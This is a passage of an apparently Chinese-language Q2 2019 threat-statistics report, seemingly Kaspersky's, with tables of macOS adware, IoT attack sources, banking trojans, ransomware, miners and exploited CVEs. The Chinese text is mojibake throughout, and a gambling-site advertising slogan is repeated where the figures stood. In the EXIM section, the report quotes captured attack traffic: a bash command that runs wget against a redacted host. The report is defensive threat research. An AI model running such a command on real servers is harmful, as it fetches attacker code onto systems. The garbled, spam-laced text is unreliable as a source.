
7.76

7

AdWare.OSX.Pirrit.o

7.59

8

AdWare.OSX.MacSearch.a

5.92

9

AdWare.OSX.Cimpli.d

5.76

10

AdWare.OSX.Mcp.a

5.39

11

AdWare.OSX.Agent.b

5.11

12

AdWare.OSX.Pirrit.q

4.31

13

AdWare.OSX.Bnodlero.v

4.02

14

AdWare.OSX.Bnodlero.q

3.70

15

AdWare.OSX.MacSearch.d

3.66

16

Downloader.OSX.InstallCore.ab

3.58

17

AdWare.OSX.Geonei.as

3.48

18

AdWare.OSX.Amc.a

3.29

19

AdWare.OSX.Agent.c

2.93

20

AdWare.OSX.Mhp.a

2.90

* Êܹ¥»÷macOSÓû§°Ù·Ö±È



¹ØÓÚQ2×î³£¼ûµÄmacOSÍþв£¬Shlayer.aľÂí£¨24.61%£©¼á³ÖÔÚ°ñÊ×£¬ÅÅÔÚµÚ¶þÃûµÄÊÇ¹ã¸æÈí¼þAdWare.OSX.Spc.a£¨12.75%£©¡£µÚÈýÃûÊÇAdWare.OSX.Bnodlero.t£¨11.98%£©£¬Ëü½«AdWare.OSX.Pirrit.j£¨11.27%£©¼·ÖÁµÚËÄ¡£ÓëÉÏÒ»¼¾¶ÈÒ»Ñù£¬Top 20ÖеĴó´ó¶¼¶¼ÊÇ¹ã¸æÈí¼þ£¬ÆäÖÐPirrit¼Ò×åÓÖÓÈΪͻ³ö£ºËüÃÇÔÚTop20ÖÐÕ¼ÓÐÁË5¸öϯλ¡£


3.2 µØÀíÂþÑÜ



                ¹ú¼Ò*                                  %**

1

·¨¹ú

11.11

2

Î÷°àÑÀ

9.68

3

Ó¡¶È

8.84

4

ÃÀ¹ú

8.49

5

¼ÓÄôó

8.35

6

¶íÂÞ˹

8.01

7

Òâ´óÀû

7.74

8

Ó¢¹ú

7.47

9

Ä«Î÷¸ç

7.08

10

°ÍÎ÷

6.85

* ²»°üÀ¨¿¨°Í˹»ùmacOSÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùmacOSÓû§ÖÐÊܹ¥»÷µÄ±ÈÀý

¾ÍmacOSÍþвµÄµØÀíÂþÑܶøÑÔ£¬·¨¹ú£¨11.11%£©¡¢Î÷°àÑÀ£¨9.68%£©ºÍÓ¡¶È£¨8.84%£©¼á³ÖÔÚǰÈý¡£
ÔÚÃÀ¹ú£¨8.49%£©¡¢¼ÓÄôó£¨8.35%£©ºÍ¶íÂÞ˹£¨8.01%£©¹ú¼Ò£¬ÊÜѬȾµÄÓû§±ÈÀýÓÐËùÔöÌí£¬Ê¹µÃÕâЩ¹ú¼ÒÔÚTop10Öл®·ÖÅÅÔÚµÚËÄ¡¢µÚÎåºÍµÚÁù¡£



ËÄ¡¢ÎïÁªÍøÍþв

__


4.1 Í·ÌõÊÂÎñ


ÔÚLinux/UnixÍþвµÄÌìÏÂÀ×îÖØ´óµÄÊÂÎñÊÇʹÓÃEXIMÓʼþÊðÀíÐÂÎó²îµÄ¹¥»÷ÊýÄ¿¼¤Ôö¡£¼ò¶øÑÔÖ®£¬¹¥»÷Õß½¨ÉèÒ»¸öÌØÊâµÄµç×ÓÓʼþ£¬²¢ÔÚÊÕ¼þÈË×Ö¶ÎÖÐÌîдҪÔÚÄ¿µÄ·þÎñÆ÷ÉÏÖ´ÐеĴúÂ룬µ±Í¨¹ýÄ¿µÄ·þÎñÆ÷·¢ËÍ´ËÓʼþʱ£¬EXIM»áÖ´ÐÐÕâЩ¶ñÒâ´úÂë¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

½Ø»ñµÄ¹¥»÷Á÷Á¿


ÉÏͼÖÐÏÔʾÁËÒ»·âÔÚRCPT×Ö¶ÎÖаüÀ¨shell¾ç±¾µÄÓʼþ¡£¸Ã¾ç±¾ÏÖʵÉÏ¿´ÆðÀ´ÈçÏ£º

1

/bin/bash        -c      "wget X.X.X.X/exm -O /dev/null



4.2 ÎïÁªÍøÍþвͳ¼Æ


2019ÄêQ2¼ûÖ¤ÁËtelnet¹¥»÷µÄÑÏÖØÏ»¬£ºÕ¼±ÈԼΪ60%£¬Q1ÖÐΪ80%¡£ÆäÔµ¹ÊÔ­ÓÉ¿ÉÄÜÊÇ·¸·¨·Ö×ÓÕýÖð²½×ªÏò¿ªÆôÁËSSHµÄ¸ü¸ßЧӲ¼þ¡£


SSH

40.43%

Telnet

59.57%

2019ÄêQ2£¬Êܹ¥»÷·þÎñµÄÂþÑÜ


È»¶ø£¬Æ¾Ö¤¿¨°Í˹»ùÃ۹޼ͼµÄÊý¾Ý£¬SSH»á»°µÄÊýÄ¿´ÓQ1µÄ64%Ͻµµ½Q2µÄ49.6%¡£


SSH

49.59%

Telnet

50.41%

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄ»á»°ÂþÑÜ


4.3 »ùÓÚTelnetµÄ¹¥»÷



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄTelnet¹¥»÷ȪԴÂþÑÜ


4.3.1 Telnet¹¥»÷ȪԴµÄ¹ú¼ÒÂþÑÜTop10


                       ¹ú¼Ò                                             %

1

°£¼°

15.06

2

Öйú

12.27

3

°ÍÎ÷

10.24

4

ÃÀ¹ú

5.23

5

¶íÂÞ˹

5.03

6

Ï£À°

4.54

7

ÒÁÀÊ

4.06

8

Öйų́Íå

3.15

9

Ó¡¶È

3.04

10

ÍÁ¶úÆä

2.90


Ò»Á¬Á½¸ö¼¾¶È£¬°£¼°£¨15.06%£©ÅÅÔÚTelnet¹¥»÷Ô´µÄ°ñÊ×£¬µÚ¶þÃûÓëÖ®²î±ð²»´ó£¬ÊÇÖйú£¨12.27%£©£¬µÚÈýÃûÊǰÍÎ÷£¨10.24%£©¡£


»ùÓÚTelnetµÄ¹¥»÷Öз¸·¨·Ö×Ó×ʹÓõŤ¾ßÊÇÎÛÃûÕÑÖøµÄMirai¼Ò×å³ÉÔ±¡£


4.3.2 Telnet¹¥»÷ÖÐÏÂÔØµÄ¶ñÒâÈí¼þTop10


                            ÌØÕ÷                                                                        %*

1

Backdoor.Linux.Mirai.b

38.92

2

Trojan-Downloader.Linux.NyaDrop.b

26.48

3

Backdoor.Linux.Mirai.ba

26.48

4

Backdoor.Linux.Mirai.au

15.75

5

Backdoor.Linux.Gafgyt.bj

2.70

6

Backdoor.Linux.Mirai.ad

2.57

7

Backdoor.Linux.Gafgyt.az

2.45

8

Backdoor.Linux.Mirai.h

1.38

9

Backdoor.Linux.Mirai.c

1.36

10

Backdoor.Linux.Gafgyt.av

1.26

* Êܹ¥»÷Óû§±ÈÀý


ÊÂʵ֤ʵ£¬Ã»ÓÐÈκÎÀíÓÉÈ¥ÆÚ´ýMiraiְλµÄת±ä£¬ËüÈÔÊÇÎïÁªÍø¹¥»÷ÖÐ×îÊ¢ÐеĶñÒâÈí¼þ¼Ò×å¡£


4.4 »ùÓÚSSHµÄ¹¥»÷


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄSSH¹¥»÷ȪԴÂþÑÜ


4.4.1 SSH¹¥»÷ȪԴµÄ¹ú¼ÒÂþÑÜTop10


                          ¹ú¼Ò                                                        %

1

Ô½ÄÏ

15.85

2

Öйú

14.51

3

°£¼°

12.17

4

°ÍÎ÷

6.91

5

¶íÂÞ˹

6.66

6

ÃÀ¹ú

5.05

7

Ì©¹ú

3.76

8

°¢Èû°Ý½®

3.62

9

Ó¡¶È

2.43

10

·¨¹ú

2.12





ÔÚ2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄSSH¹¥»÷ȪԴÂþÑÜTop3»®·ÖÊÇÔ½ÄÏ£¨15.85%£©¡¢Öйú£¨14.51%£©ºÍ°£¼°£¨12.17%£©¡£Q1ÖÐÅÅÃûµÚ¶þµÄÃÀ¹ú£¨5.05%£©±¾¼¾¶ÈÏ»¬ÖÁµÚÆßÃû¡£

Îå¡¢½ðÈÚÍþв

__


5.1 ½ðÈÚÍþвͳ¼Æ


ÔÚ2019ÄêQ2£¬¿¨°Í˹»ù²úÆ·¹²ÔÚ228,206ÃûÓû§µÄÅÌËã»úÉÏ×èÖ¹ÁËÕë¶ÔÒøÐÐÕË»§µÄ¶ñÒâÈí¼þ¹¥»÷¡£



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬ÊܽðÈÚÍþв¹¥»÷µÄÓû§ÊýÄ¿



5.2 µØÀíÂþÑÜ


ΪÁËÆÀ¹ÀºÍ½ÏÁ¿È«Çò¹æÄ£ÄÚÒøÐÐľÂíºÍATM/POS¶ñÒâÈí¼þµÄѬȾΣº¦£¬¿¨°Í˹»ùͳ¼ÆÁ˲î±ð¹ú¼ÒÊÜ´ËÀàÍþв¹¥»÷µÄÓû§ËùÕ¼±ÈÀý¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬ÒøÐжñÒâÈí¼þ¹¥»÷µÄµØÀíÂþÑÜ


5.2.1 Êܹ¥»÷Óû§µÄ¹ú¼ÒÂþÑÜTop10


                        ¹ú¼Ò*                            %**

1

°×¶íÂÞ˹

2.0

2

ίÄÚÈðÀ­

1.8

3

Öйú

1.6

4

Ó¡¶ÈÄáÎ÷ÑÇ

1.3

5

º«¹ú

1.3

6

ÈûÆÖ·˹

1.2

7

°ÍÀ­¹ç

1.2

8

¶íÂÞ˹

1.2

9

¿¦Âó¡

1.1

10

Èû¶ûάÑÇ

1.1

* ²»°üÀ¨¿¨°Í˹»ùÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÓû§ÖÐÊÜÒøÐÐľÂí¹¥»÷µÄ±ÈÀý



5.2.2 ÒøÐжñÒâÈí¼þ¼Ò×åTop10


                   Ãû³Æ                          ÌØÕ÷                                                                                %*

1

RTM

Trojan-Banker.Win32.RTM

32.2


2

Zbot

Trojan.Win32.Zbot

23.3


3

Emotet

Backdoor.Win32.Emotet

8.2


4

Nimnul

Virus.Win32.Nimnul

6.4


5

Trickster

Trojan.Win32.Trickster

5.0


6

Nymaim

Trojan.Win32.Nymaim

3.5


7

SpyEye

Backdoor.Win32.SpyEye

3.2


8

Neurevt

Trojan.Win32.Neurevt

2.8


9

IcedID

Trojan-Banker.Win32.IcedID

1.2


10

Gozi

Trojan.Win32.Gozi

1.1


* Êܹ¥»÷Óû§±ÈÀý


Óëǰһ¼¾¶ÈÏà±È£¬2019ÄêQ2µÄÒøÐжñÒâÈí¼þTop3ûÓб¬·¢×ª±ä¡£Ç°Á½ÃûµÄÁìÏÈ·ù¶È½Ï´ó£¬»®·ÖÊÇTrojan-Banker.Win32.RTM£¨32.2%£©ºÍTrojan.Win32.Zbot£¨23.3%£©¡£ËüÃǵķݶ·ÖÔöÌíÁË4.8ºÍ0.4¸ö°Ù·Ö±È¡£ÅÅÔÚØÊºóµÄÊÇBackdoor.Win32.Emotet£¨8.2%£©£¬ËüµÄ·Ý¶îÏà·´ÊÇϵøÁË1.1¸ö°Ù·Öµã¡£´Ó6Ô·Ý×îÏÈ£¬Emotet C&C·þÎñÆ÷µÄÔ˶¯Öð½¥ïÔÌ­£¬µ½ÁËQ3³õÆÚÏÕЩËùÓеÄC&C½©Ê¬ÍøÂç¶¼ÒѲ»¿ÉÓá£


ÔÚQ2ÖÐTrojan-Banker.Win32.IcedID£¨1.2%£©ºÍTrojan.Win32.Gozi£¨1.1%£©·ºÆðÔÚTop10ÖУ¬ÅÅÁеھź͵ÚÊ®¡£

Áù¡¢ÀÕË÷Èí¼þ

__



6.1 ¼¾¶ÈÁÁµã


¾­ÓÉ18¸öÔÂµÄÆð¾¢·Ö·¢ºó£¬ÀÕË÷Èí¼þGandCrab±³ºóµÄ·¸·¨ÍÅ»ïÐû²¼Í˳ö¡£Æ¾Ö¤¿¨°Í˹»ùµÄ±¨¸æ£¬¸ÃÀÕË÷Èí¼þ³ÉΪ×îÊ¢ÐеļÓÃÜÍþв֮һ¡£


ÔÚQ2£¬ÐÂÀÕË÷Èí¼þSodin£¨ÓÖÃûSodinokibiºÍREvil£©×îÏȾÙÐÐÈö²¥¡£¸ÃÀÕË÷Èí¼þÓм¸µãÖµµÃ×¢ÖØ£¬Ëüͨ¹ý±»ÈëÇֵķþÎñÆ÷¾ÙÐзַ¢£¬²¢ÇÒʹÓÃÁËÒ»¸öÓÐÊýµÄLPE exp£¬¸ü²»±ØÌáÆäÖØ´óµÄ¼ÓÃÜģʽ¡£


ÕÕ¾ÉÔÚQ2£¬·ºÆðÁËһЩÕë¶Ô¶¼»áÖÎÀí²¿·ÖµÄ¸ßµ÷ÀÕË÷Èí¼þ¹¥»÷ÊÂÎñ¡£Õâ²¢²»ÊÇÒ»¸öеÄÇ÷ÊÆ£¬ÈëÇÖÆóÒµ¼°ÊÐÕþÍøÂç¾ÙÐÐڲƭÊdz£¼ûµÄ¹¥»÷³¡¾°¡£µ«½üÄêÀ´´ËÀàÊÂÎñµÄ´ó¹æÄ£±¬·¢ÒýÆðÁËÈËÃǶÔÒªº¦ÅÌËã»ú»ù´¡ÉèÊ©µÄÇå¾²ÐԵĹØ×¢£¬ÓÉÓÚ²»µ«½öÊÇСÎÒ˽¼ÒºÍÆóÒµ£¬Õû¸öÉçÇø¶¼ÒÀÀµÓÚÕâЩ»ù´¡ÉèÊ©¡£


6.2 бäÖÖµÄÊýÄ¿


2019ÄêQ2¿¨°Í˹»ù¼ì²âµ½8¸öеÄÀÕË÷Èí¼þ¼Ò×壬²¢ÇÒ·¢Ã÷ÁË16,017¸öбäÖÖ¡£Ïà±ÈÖ®ÏÂQ1µÄбäÖÖÊýÄ¿ÊÇ5,222¸ö£¬Ö»ÓÐQ2µÄÈý·ÖÖ®Ò»¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2018ÄêQ2 ¨C 2019ÄêQ2£¬ÀÕË÷Èí¼þбäÖÖµÄÊýÄ¿±ÈÕÕ


´ó´ó¶¼Ð±äÖÖÊôÓÚTrojan-Ransom.Win32.Gen¼Ò×壨»ùÓÚÐÐΪ¹æÔò×Ô¶¯¼ì²âµ½µÄÖÖÖÖľÂí£©ºÍTrojan-Ransom.Win32.PolyRansom¡£ÆäÖÐPolyRansomµÄ±äÖÖÊýÄ¿ÊÇÓÉÆäÌìÐÔ¾öÒéµÄ ¨C ¸ÃÈ䳿»á½¨Éè×ÔÉíµÄ´ó×ÚÍ»±äÌ壬²¢½«ÕâЩ±äÌåÌæ»»ÎªÓû§Îļþ£¬½«¼ÓÃܺóµÄÓû§Êý¾Ý°²ÅÅÆäÖС£


6.3 Êܹ¥»÷Óû§ÊýÄ¿


2019ÄêQ2¿¨°Í˹»ù²úÆ·¹²±£»¤232,292¸öKSNÓû§×èÖ¹ÁËÀÕË÷Èí¼þ¹¥»÷£¬±ÈÉÏÒ»¼¾¶ÈïÔÌ­ÁË5Íò¶à¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬ÔâÊÜÀÕË÷Èí¼þ¹¥»÷µÄÓû§ÊýÄ¿


Êܹ¥»÷Óû§ÊýÄ¿×î¶àµÄÔ·ÝÊÇ4Ô£¨107,653£©£¬ËüÉõÖÁ¸ßÓÚ3Ô·ݵÄÊý×Ö£¨106,519£©£¬Õâ±ê¼Ç×ÅQ1ÖÐÉÏÉýÇ÷ÊÆµÄÑÓÐø¡£È»¶ø£¬ÔÚ5Ô·ÝÕâÒ»Êý×Ö×îÏÈϽµ£¬µ½ÁË6Ô·ÝÖ»ÓÐ82,000¶àÒ»µã¡£


6.4 µØÀíÂþÑÜ


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬Êܹ¥»÷Óû§µÄµØÀíÂþÑÜ


6.4.1 Êܹ¥»÷Óû§µÄ¹ú¼ÒÂþÑÜTop 10



                   ¹ú¼Ò*                                                                                       %**

1

ÃϼÓÀ­¹ú

8.81%

2

ÎÚ×ȱð¿Ë˹̹

5.52%

3

Īɣ±È¿Ë

4.15%

4

°£Èû¶í±ÈÑÇ

2.42%

5

Äá²´¶û

2.26%

6

°¢¸»º¹

1.50%

7

Öйú

1.18%

8

¼ÓÄÉ

1.17%

9

º«¹ú

1.07%

10

¹þÈø¿Ë˹̹

1.06%

* ²»°üÀ¨¿¨°Í˹»ùÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ5Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÓû§ÖÐÊÜÀÕË÷Èí¼þ¹¥»÷µÄ±ÈÀý



6.5 ÀÕË÷Èí¼þTop10


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!





** Êܹ¥»÷Óû§±ÈÀý* ¿¨°Í˹»ùµÄ¼ì²âЧ¹û



Æß¡¢¶ñÒâ¿ó¹¤


___


7.1 бäÖÖµÄÊýÄ¿


2019ÄêQ2¿¨°Í˹»ù¼ì²âµ½7,156¸ö¶ñÒâ¿ó¹¤Ð±äÖÖ£¬±ÈQ1ÉÙÁË¿ìÒª5,000¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬¶ñÒâ¿ó¹¤Ð±äÖÖµÄÊýÄ¿


4Ô·ݵÄбäÖÖÊýÄ¿×î¶à£¨3,101£©£¬ÏÕЩ±È3Ô·ݶàÁ˽ü1000¸ö£¬µ«Æ½¾ùÏÂÀ´Ð¿ó¹¤ÕÕ¾ÉÔ½À´Ô½ÉÙ¡£

7.2 Êܹ¥»÷Óû§ÊýÄ¿


Q2¿¨°Í˹»ùÔÚÈ«Çò¹æÄ£ÄÚ¹²ÔÚ749,766¸öÓû§µÄÅÌËã»úÉϼì²âµ½¶ñÒâ¿ó¹¤¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬ÊܶñÒâ¿ó¹¤¹¥»÷µÄÓû§ÊýÄ¿

ÕûÌåÀ´¿´£¬Q2Êܹ¥»÷Óû§ÊýÄ¿Öð½¥ïÔÌ­ ¨C ´Ó4Ô·ݵÄ383,000ϽµÖÁ6Ô·ݵÄ318,000¡£


7.3 µØÀíÂþÑÜ



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!


2019ÄêQ2£¬Êܹ¥»÷Óû§µÄµØÀíÂþÑÜ



ÊܶñÒâ¿ó¹¤¹¥»÷µÄÓû§¹ú¼ÒÂþÑÜTop 10


                    ¹ú¼Ò*                                                                          % Êܹ¥»÷Óû§±ÈÀý**

1

°¢¸»º¹

10.77%

2

°£Èû¶í±ÈÑÇ

8.99%

3

ÎÚ×ȱð¿Ë˹̹

6.83%

4

¹þÈø¿Ë˹̹

4.76%

5

̹ɣÄáÑÇ

4.66%

6

Ô½ÄÏ

4.28%

7

Īɣ±È¿Ë

3.97%

8

ÎÚ¿ËÀ¼

3.08%

9

°×¶íÂÞ˹

3.06%

10

ÃɹÅ

3.06%

* ²»°üÀ¨¿¨°Í˹»ùÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ5Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâ¿ó¹¤¹¥»÷µÄ±ÈÀý




°Ë¡¢·¸·¨·Ö×ÓÖØµã¹Ø×¢µÄųÈõÓ¦ÓÃ

______________________________________


ÔÚÒÑÍùµÄÒ»ÄêÖУ¬OfficeÌ×¼þ³ÉΪ×î³£Êܵ½¹¥»÷µÄÓ¦ÓóÌÐò¡£2019ÄêQ2Ò²²»ÆÆÀý ¨C OfficeÎó²îʹÓõıÈÀý´Ó67%ÔöÌíµ½72%¡£ÕâÒ»ÔöÌí±³ºóµÄÔµ¹ÊÔ­ÓÉÊÇ´ó×ÚµÄÀ¬»øÓʼþÖаüÀ¨ÁËCVE-2017-11882¡¢CVE-2018-0798ºÍCVE-2018-0802Îó²îʹÓá£ÕâЩÎó²îÓëOfficeµÄ¹«Ê½±à¼­Æ÷×é¼þÓйØ£¬Ê¹ÓÃÁ˹¤¾ß´¦Öóͷ£Àú³ÌÖеĻº³åÇøÒç³öbug¾ÙÐÐÔ¶³Ì´úÂëÖ´ÐС£ÆäËü³£±»·¸·¨·Ö×ÓʹÓõÄOfficeÎó²î»¹°üÀ¨CVE-2017-8570ºÍCVE-2017-8759¡£


OfficeÎó²îʹÓõÄÈÕÒæÆÕ¼°Åú×¢£¬·¸·¨·Ö×Ó½«ÆäÊÓΪÔÚÄ¿µÄÅÌËã»úÉϰ²ÅŶñÒâÈí¼þµÄ×î¼òÆÓ¿ì½Ý·½·¨¡£»»¾ä»°Ëµ£¬ÕâЩÎó²îʹÓøüÓпÉÄÜÀֳɣ¬ÓÉÓÚËüÃǵÄÃûÌÃʹµÃ¿ÉÒÔʹÓÃÖÖÖÖÊÖÒÕÈÆ¹ý¾²Ì¬µÄ¼ì²â¹¤¾ß£¬²¢ÇÒÆäÖ´ÐжÔÓû§ÊÇÒþ²ØµÄ£¬ÎÞÐèÌØÁíÍâÐж¯£¬ÀýÈçºê¾ç±¾¡£



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!


2019ÄêQ2£¬·¸·¨·Ö×ÓʹÓõÄÎó²îʹÓÃÂþÑÜ


Q2 webä¯ÀÀÆ÷ÖеÄÎó²îʹÓÃÕ¼±ÈΪ14%£¬ÊÇOfficeÎó²îʹÓõÄÎå·ÖÖ®Ò»¡£´ó´ó¶¼ä¯ÀÀÆ÷Îó²îÊǼ´Ê±´úÂë±àÒëºÍ¶à½×¶Î´úÂëÓÅ»¯¹ýʧµÄЧ¹û¡£ÕâЩÀú³ÌµÄÂß¼­Ïà¶ÔÖØ´ó£¬ÐèÒª¿ª·¢Ö°Ô±ÌØÊâСÐÄ¡£¶ÔÊý¾ÝºÍÊý¾ÝÀàÐÍת±äµÄ²»³ä·Ö¼ì²éÍùÍù»áµ¼ÖÂÐÂÎó²î¡£ÆäËü¿Éµ¼ÖÂRCEµÄ³£¼ûÎÊÌ⻹°üÀ¨Êý¾ÝÀàÐÍÒç³ö¡¢ÒÑÊÍ·ÅÄÚ´æÔÙʹÓúͲ»×¼È·µÄÀàÐÍʹÓᣱ¾¼¾¶È×îÓÐȤµÄÒ»¸öÀý×Ó»òÐíÊÇÕë¶ÔCoinbaseºÍÆäËü¼¸¼Ò¹«Ë¾µÄÒ»¸ö0dayʹÓá£ËüÔÚÒ°Íâ±»·¢Ã÷£¬Ê¹ÓÃÁËMozilla FirefoxÖеÄRCEÎó²îCVE-2019-11707ºÍCVE-2019-11708¡£

ÔÚ0day·½Ã棬Q2Çå¾²Ñо¿Ô±SandboxEscaperÐû²¼µÄexpÓÈÆäÖµµÃ×¢ÖØ¡£ÕâЩexp±»ÃüÃûΪPolarBear£¬Ê¹ÓÃÁËWindows 10ÖеÄÌáȨÎó²îCVE-2019-1069¡¢CVE-2019-0863¡¢CVE-2019-0841ºÍCVE-2019-0973¡£


Q2ÍøÂç¹¥»÷µÄÕ¼±È¼ÌÐøÔöÌí¡£·¸·¨·Ö×ÓûÓÐÒÅÍüÕë¶ÔδÐÞ²¹SMBϵͳµÄÓÀºãÖ®À¶¹¥»÷£¬Ò²¼ÌÐøÆð¾¢ÔÚÍøÂçÓ¦Óã¨ÈçOracle WebLogic£©ÖÐÒýÈëеÄÎó²îʹÓ᣻¹Òª×¢ÖØÕë¶ÔRDP·þÎñºÍMicrosoft SQLServerµÄÃÜÂë¹¥»÷¡£¿ÉÊÇ£¬´ó´ó¶¼Óû§ÃæÁÙµÄ×î´óÍþвÕÕ¾ÉQ2ÖÐÅû¶µÄÎó²î CVE-2019-0708¡£¸ÃÎó²îÓ°ÏìÁËXP¡¢win7ºÍwindows server 2008ÖеÄÔ¶³Ì×ÀÃæ·þÎñ¡£·¸·¨·Ö×Ó¿ÉÒÔʹÓÃËüÀ´»ñȡԶ³Ì¿ØÖÆÈ¨£¬²¢ÇÒ½¨ÉèÀàËÆÓÚWanaCryµÄÍøÂçÈ䳿¡£¶Ô´«ÈëÊý¾Ý°üµÄ²»³ä·ÖɨÃèÔÊÐí¹¥»÷ÕßʹÓÃUAF¾ç±¾ÁýÕÖÄÚºËÄÚ´æÖеÄÊý¾Ý¡£Çë×¢ÖØ¸ÃÎó²îʹÓÃÎÞÐè»ñÈ¡ÕË»§ÃÜÂ룬¼´Ëü±¬·¢ÔÚÑéÖ¤Óû§ÃûºÍÃÜÂë֮ǰµÄÊÚȨ½×¶Î¡£


8.1 ͨ¹ýÍøÂç×ÊÔ´ÌᳫµÄ¹¥»÷


8.1.1 ÍøÂç¹¥»÷ȪԴ¹ú¼ÒµÄTop10


2019ÄêQ2¿¨°Í˹»ù½â¾ö¼Æ»®×èÖ¹ÁËÈ«Çò203¸ö¹ú¼ÒµÄÔÚÏß×ÊÔ´ÌᳫµÄ717,057,912´Î¹¥»÷¡£Web·´²¡¶¾×é¼þ¼ì²âµ½217,843,293¸ö²î±ðµÄ¶ñÒâURL¡£


×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!


2019ÄêQ2£¬ÍøÂç¹¥»÷ȪԴµÄ¹ú¼ÒÂþÑÜ


±¾¼¾¶ÈWeb·´²¡¶¾×é¼þ×î³£±»ÃÀ¹úµÄÔÚÏß×ÊÔ´´¥·¢¡£ÕûÌåÀ´¿´£¬Top 4ÅÅÃûÓëǰһ¼¾¶ÈûÓÐת±ä¡£


8.1.2 Óû§Ñ¬È¾Î£º¦×î¸ßµÄ¹ú¼Ò


ΪÁËÆÀ¹À²î±ð¹ú¼ÒÓû§ÃæÁÙµÄÔÚÏßѬȾΣº¦£¬¿¨°Í˹»ùͳ¼ÆÁ˸ùú¼ÒWeb·´²¡¶¾×é¼þ±»´¥·¢µÄÓû§°Ù·Ö±È¡£Óɴ˱¬·¢µÄÊý¾ÝÅú×¢Îú²î±ð¹ú¼ÒÍøÂçÇéÐεÄÇÖÂÔÐÔ¡£


¸ÃÅÅÃû½ö°üÀ¨¶ñÒâÈí¼þÀàµÄ¹¥»÷£¬²»°üÀ¨ÈκÎDZÔÚÓꦻòΣÏÕ³ÌÐò£¬ÀýÈç»ÒÉ«Èí¼þºÍ¹ã¸æÈí¼þ¡£



                        ¹ú¼Ò*                                                                                  % Êܹ¥»÷Óû§°Ù·Ö±È**

1

°¢¶û¼°ÀûÑÇ

20.38

2

ίÄÚÈðÀ­

19.13

3

°¢¶û°ÍÄáÑÇ

18.30

4

Ï£À°

17.36

5

Ħ¶û¶àÍß

17.30

6

ÃϼÓÀ­¹ú

16.82

7

°®É³ÄáÑÇ

16.68

8

°¢Èû°Ý½®

16.59

9

°×¶íÂÞ˹

16.46

10

ÎÚ¿ËÀ¼

16.18

11

·¨¹ú

15.84

12

·ÆÂɱö

15.46

13

ÑÇÃÀÄáÑÇ

15.40

14

Í»Äá˹

15.29

15

±£¼ÓÀûÑÇ

14.73

16

²¨À¼

14.69

17

ÁôÄáÍô

14.68

18

À­ÍÑάÑÇ

14.65

19

ÃØÂ³

14.50

20

¿¨Ëþ¶û

14.32

* ²»°üÀ¨¿¨°Í˹»ùÓû§½ÏÉٵĹú¼Ò£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¼ÒËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâÈí¼þ¹¥»÷µÄ±ÈÀý



ƽ¾ù¶øÑÔ£¬±¾¼¾¶ÈÈ«Çò12.12%µÄ»¥ÁªÍøÓû§Ôâµ½ÖÁÉÙÒ»´Î¶ñÒâÈí¼þ¹¥»÷¡£



×ðÁú¿­Ê±¡¤(ÖйúÇø)ÈËÉú¾ÍÊDz«!

2019ÄêQ2£¬¶ñÒâÍøÂç¹¥»÷µÄµØÀíÂþÑÜ


8.2 ÍâµØÍþв


2019ÄêQ2¿¨°Í˹»ùÎļþ·´²¡¶¾ÏµÍ³¼ì²âµ½240,754,063¸ö¶ñÒ⼰DZÔÚÓк¦Ñù±¾¡£


8.2.2 ÍâµØÑ¬È¾Î£º¦×î¸ßµÄ¹ú¼Ò


                     ¹ú¼Ò*                                                                                             % Êܹ¥»÷Óû§±ÈÀý**

1

°¢¸»º¹

55.43

2

Ëþ¼ª¿Ë˹̹

55.27

3

ÎÚ×ȱð¿Ë˹̹

55.03

4

Ò²ÃÅ

52.12

5

ÍÁ¿âÂü˹̹

50.75

6

ÀÏÎÎ

46.12

7

ÐðÀûÑÇ

46.00

8

Ãåµé

45.61

9

ÃɹÅ

45.59

10

°£Èû¶í±ÈÑÇ

44.95

11

ÃϼÓÀ­¹ú

44.11

12

ÒÁÀ­¿Ë

43.79

13

Öйú

43.60

14

²£ÀûάÑÇ

43.47

15

Ô½ÄÏ

43.22

16

ίÄÚÈðÀ­

42.71

17

°¢¶û¼°ÀûÑÇ

42.33

18

¹Å°Í

42.31

19

Īɣ±È¿Ë

42.14

20

¬Íú´ï

42.02

